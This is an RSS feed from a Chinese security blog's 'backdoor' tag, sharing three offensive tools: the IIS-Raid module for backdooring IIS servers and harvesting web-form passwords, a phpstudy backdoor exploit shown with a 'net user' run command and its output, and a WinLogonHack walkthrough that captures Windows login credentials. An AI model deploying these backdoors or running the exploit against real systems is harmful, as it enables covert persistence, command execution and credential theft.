<?xml version="1.0" encoding="UTF-8"?><rss version="2.0"
	xmlns:content="http://purl.org/rss/1.0/modules/content/"
	xmlns:wfw="http://wellformedweb.org/CommentAPI/"
	xmlns:dc="http://purl.org/dc/elements/1.1/"
	xmlns:atom="http://www.w3.org/2005/Atom"
	xmlns:sy="http://purl.org/rss/1.0/modules/syndication/"
	xmlns:slash="http://purl.org/rss/1.0/modules/slash/"
	>

<channel>
	<title>后门 &#8211; ChaBug安全</title>
	<atom:link href="/tags/%E5%90%8E%E9%97%A8/feed" rel="self" type="application/rss+xml" />
	<link>/</link>
	<description>一个分享知识、结识伙伴、资源共享的博客</description>
	<lastBuildDate>Wed, 19 Feb 2020 16:00:30 +0000</lastBuildDate>
	<language>zh-CN</language>
	<sy:updatePeriod>
	hourly	</sy:updatePeriod>
	<sy:updateFrequency>
	1	</sy:updateFrequency>
	<generator>https://wordpress.org/?v=5.5.5</generator>
	<item>
		<title>权限维持之iis backdoor module</title>
		<link>/tools/1249.html</link>
		
		<dc:creator><![CDATA[Y4er]]></dc:creator>
		<pubDate>Wed, 19 Feb 2020 16:00:30 +0000</pubDate>
				<category><![CDATA[工具分享]]></category>
		<category><![CDATA[backdoor]]></category>
		<category><![CDATA[iis]]></category>
		<category><![CDATA[后门]]></category>
		<category><![CDATA[权限维持]]></category>
		<guid isPermaLink="false">/?p=1249</guid>

					<description><![CDATA[IIS-Raid IS Raid is a native IIS module that abuses the extendibility of IIS to backdoor t...]]></description>
										<content:encoded><![CDATA[<h1>IIS-Raid</h1>
<p>IS Raid is a native IIS module that abuses the extendibility of IIS to <span class="wpcom_tag_link"><a href="/tags/backdoor" title="backdoor" target="_blank">backdoor</a></span> the web server and carry out custom actions defined by an attacker.</p>
<h2>Documentation</h2>
<p>When installed, IIS-Raid will process every request and method, check if the X-Password header exists and compare it against the hardcoded value.<br />
In case the value specified by the header doesn&#8217;t match the password, the request will continue normally without giving any indications of the backdoor.<br />
If the header value matches the password, it will search for the communication header and extract its content. Additionally, it will base64 decode it, compare it against the predefined commands and process the instructions if any.</p>
<p>Four arguments are implemented on the script:<br />
* &#8211;url : The URL that will be used to communicate with the backdoor. [Required]<br />
* &#8211;password &#8211; The pre-shared password on the backdoor [Required]<br />
* &#8211;header &#8211; The header to use for communication in case it was changed from the default one.<br />
* &#8211;method &#8211; Change the method to either GET or POST.</p>
<p>Some of the features that are currently implemented in this version are:<br />
* Interactive Command Execution &#8211; Allows the execution of commands and retrieve the output.<br />
* Shellcode Injection &#8211; Extend functionality by injecting custom shellcode.<br />
* Web Password Extractor &#8211; Extract passwords from Web Forms in clear-text.</p>
<h2>Customisation</h2>
<p>Before using and compiling the module, you need to change some of the options. To authenticate to the backdoor, the controller uses a pre-shared password with the module. As this is the only mechanism preventing someone else from accessing the backdoor, the default password must be changed.</p>
<p>Apart from the password, other backdoor options can be modified on the Functions.h file:</p>
<p><img src="https://github.com/0x09AL/IIS-Raid/raw/master/images/options.png" alt="options" /></p>
<p>The COM_HEADER definition is the header name used to perform the communication between the backdoor and the controller.<br />
The PASS_FILE definition is the file path where the extracted credentials from the web forms will be saved.<br />
The PASSWORD definition is the password that will be used to authenticate to the backdoor.</p>
<h2>More info</h2>
<p>For more information refer to https://www.mdsec.co.uk/2020/02/<span class="wpcom_tag_link"><a href="/tags/iis" title="iis" target="_blank">iis</a></span>-raid-backdooring-iis-using-native-modules/</p>
<h3>Demo Video</h3>
<p><iframe title="IIS-Raid Demo" width="500" height="281" src="https://www.youtube.com/embed/jbxEWOXecuU?feature=oembed" frameborder="0" allow="accelerometer; autoplay; encrypted-media; gyroscope; picture-in-picture" allowfullscreen></iframe></p>
<h3>Screenshot</h3>
<p><img src="/wp-content/uploads/2020/02/screenshot.png" alt="options" /></p>
]]></content:encoded>
					
		
		
			</item>
		<item>
		<title>phpstudy后门golang利用工具</title>
		<link>/tools/978.html</link>
		
		<dc:creator><![CDATA[Y4er]]></dc:creator>
		<pubDate>Wed, 25 Sep 2019 14:36:51 +0000</pubDate>
				<category><![CDATA[工具分享]]></category>
		<category><![CDATA[backdoor]]></category>
		<category><![CDATA[phpstudy]]></category>
		<category><![CDATA[后门]]></category>
		<guid isPermaLink="false">/?p=978</guid>

					<description><![CDATA[phpstudy_backdoor 仅供检测 自己的 phpstudy环境，请勿对其他网站使用。 go run phpstudy_backdoor.go http://localh...]]>/</description>
										<content:encoded><![CDATA[<p><span class="wpcom_tag_link"><a href="/tags/phpstudy" title="phpstudy" target="_blank">phpstudy</a></span>_<span class="wpcom_tag_link"><a href="/tags/backdoor" title="backdoor" target="_blank">backdoor</a></span><br />
仅供检测 自己的 phpstudy环境，请勿对其他网站使用。</p>
<pre><code class="">go run phpstudy_backdoor.go http://localhost/index.php &amp;quot;net user&amp;quot;

Active code page: 65001

User accounts for \\WIN-25US8G3F849

-------------------------------------------------------------------------------
Administrator            Guest                    
The command completed successfully.
</code></pre>
<p>https://github.com/Any3ite/phpstudy_backdoor</p>
<p>phpstudy<span class="wpcom_tag_link"><a href="/tags/%e5%90%8e%e9%97%a8" title="后门" target="_blank">后门</a></span>事件详情：<br />
https://mp.weixin.qq.com/s/dTzWfYGdkNqEl0vd72oC2w</p>
]]></content:encoded>
					
		
		
			</item>
		<item>
		<title>WinLogonHack 后门</title>
		<link>/tools/321.html</link>
		
		<dc:creator><![CDATA[Y4er]]></dc:creator>
		<pubDate>Tue, 16 Jan 2018 19:44:00 +0000</pubDate>
				<category><![CDATA[工具分享]]></category>
		<category><![CDATA[windows]]></category>
		<category><![CDATA[后门]]></category>
		<guid isPermaLink="false">/?p=15</guid>

					<description><![CDATA[一个适合win的后门 文件传到服务器上 一共7个文件运行 install.bat 注销远程会话 重新登录 运行 ReadLog.bat 查看同目录下 pass.txt 登录时间 账...]]></description>
										<content:encoded><![CDATA[<p>一个适合win的<span class="wpcom_tag_link"><a href="/tags/%e5%90%8e%e9%97%a8" title="后门" target="_blank">后门</a></span></p>
<p>文件传到服务器上 一共7个文件<br /><img src="https://ws1.sinaimg.cn/large/006xriynly1fniol3hb04j304f03zt8l.jpg" alt="" title=""><br />运行 install.bat<br /><img src="https://ws1.sinaimg.cn/large/006xriynly1fnioldtz6lj307i03xjra.jpg" alt="" title=""></p>
<p>注销远程会话 重新登录<br /><img src="https://ws1.sinaimg.cn/large/006xriynly1fniolpr5hzj30c707z0sw.jpg" alt="" title=""></p>
<p>运行 ReadLog.bat</p>
<p><img src="https://ws1.sinaimg.cn/large/006xriynly1fniolyb080j306j035mx1.jpg" alt="" title=""></p>
<p>查看同目录下 pass.txt</p>
<p><img src="https://ws1.sinaimg.cn/large/006xriynly1fniom799k5j306404c748.jpg" alt="" title=""></p>
<p>登录时间 账号 域 密码 都出来了</p>
<p>运行 uninstall.bat 卸载</p>
<p><img src="https://ws1.sinaimg.cn/large/006xriynly1fniomhemzlj308h02g3yf.jpg" alt="" title=""></p>
<p><a href="https://pan.baidu.com/s/1bqDuIVd">下载地址点我</a></p>
]]></content:encoded>
					
		
		
			</item>
	</channel>
</rss>
